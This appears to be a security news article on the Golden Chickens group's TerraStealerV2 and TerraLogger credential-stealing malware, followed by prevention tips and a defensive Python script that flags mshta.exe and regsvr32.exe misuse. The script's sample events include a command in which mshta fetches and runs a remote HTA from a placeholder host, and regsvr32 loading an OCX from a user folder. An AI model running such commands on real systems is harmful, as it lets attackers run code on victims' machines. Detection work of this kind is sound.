Golden Chickens Spread Malware to Steal Credentials
Golden Chickens, a known cybercrime group, has launched two new malware tools: TerraStealerV2 and TerraLogger. These tools focus on stealing sensitive user data.
According to a recent report, TerraStealerV2 targets browser credentials, crypto wallets, and extension data. TerraLogger, however, logs keystrokes using a basic keyboard hook.
Both tools reflect the group’s ongoing efforts to expand their malware-as-a-service (MaaS) offerings. Golden Chickens, also known as Venom Spider, has been active since 2018.
The group has built several tools over time. For example, they’ve developed More_eggs, TerraCrypt, VenomLNK, and TerraLoader, all designed for data theft and system access.
Researchers have linked the group to a persona called badbullzvenom. This identity appears to be run by individuals from Canada and Romania.
TerraStealerV2 spreads in various forms. These include EXEs, DLLs, MSI installers, and shortcut files. In most cases, the payload is an OCX file retrieved from an external domain.
However, this malware does not bypass newer Chrome protections. Therefore, it may still be under development or contain outdated code.
Captured data is sent to Telegram and to the same domain that delivered the payload. The malware also runs through trusted Windows tools such as regsvr32.exe and mshta.exe to avoid detection.
TerraLogger, on the other hand, only logs keystrokes. It doesn’t send data or communicate with a control server. This suggests it may be paired with other tools in the future.
Other recent stealers, such as Hannibal Stealer and StealC V2, show similar goals. For instance, StealC V2 can now deliver payloads through MSI files and PowerShell, and it uses RC4 encryption for better stealth.
These threats come with redesigned control panels and broader data-harvesting features. Some include geolocation targeting and Telegram bot alerts.
How to Prevent Credential Theft from Malware Attacks
To protect your systems, always update browsers, extensions, and operating systems. Outdated software leaves openings for malware like TerraStealerV2.
Use reputable antivirus tools and monitor for suspicious processes. For example, look for the misuse of Windows utilities like mshta.exe or regsvr32.exe.
Avoid downloading unknown files or clicking unverified links. Also, educate your team on phishing risks and safe online behavior. Prevention starts with awareness and action.
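As an added example (not taken from the report or from any vendor's tooling), the monitoring advice above can be turned into a simple triage pass over process-creation events. The field names, trusted directories, parent-process list and sample events are assumptions made for illustration.

```python
import re

# Heuristics are illustrative assumptions, not vendor signatures or IoCs from the report.
URL = re.compile(r"https?://", re.I)
OCX = re.compile(r'"([^"]+\.ocx)"|([^\s"]+\.ocx)', re.I)
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\program files")
ODD_PARENTS = {"msiexec.exe", "powershell.exe", "wscript.exe", "cmd.exe", "mshta.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(ev):
    """Return the reasons a process-creation event looks like LOLBin misuse."""
    image, cmd = basename(ev["image"]), ev["command_line"]
    reasons = []
    if image == "mshta.exe" and URL.search(cmd):
        reasons.append("mshta.exe given a remote URL")
    if image == "regsvr32.exe":
        if URL.search(cmd):
            reasons.append("regsvr32.exe given a remote URL")
        for m in OCX.finditer(cmd):
            path = (m.group(1) or m.group(2)).lower()
            if not path.startswith(TRUSTED_DIRS):
                reasons.append("regsvr32.exe loading OCX outside trusted dirs: " + path)
    parent = basename(ev.get("parent_image", ""))
    if reasons and parent in ODD_PARENTS:
        reasons.append("spawned by " + parent)
    return reasons

def scan(events):
    """Return (index, reasons) for every event with at least one finding."""
    return [(i, r) for i, ev in enumerate(events) if (r := score_event(ev))]

# Constructed sample events; keys are a hypothetical normalized schema
# (compare Sysmon Event ID 1: Image, CommandLine, ParentImage).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r'regsvr32.exe /s "C:\Users\alice\AppData\Roaming\sample.ocx"',
     "parent_image": r"C:\Windows\System32\cmd.exe"},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://delivery.example.invalid/page.hta",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r'regsvr32.exe /s "C:\Program Files\Vendor\control.ocx"',
     "parent_image": r"C:\Windows\System32\msiexec.exe"},
]

if __name__ == "__main__":
    for idx, reasons in scan(SAMPLE_EVENTS):
        print(idx, "; ".join(reasons))
```

The third sample event is a benign installer registering a control from Program Files and is deliberately left unflagged, which shows why path and parent context matter more than the binary name alone.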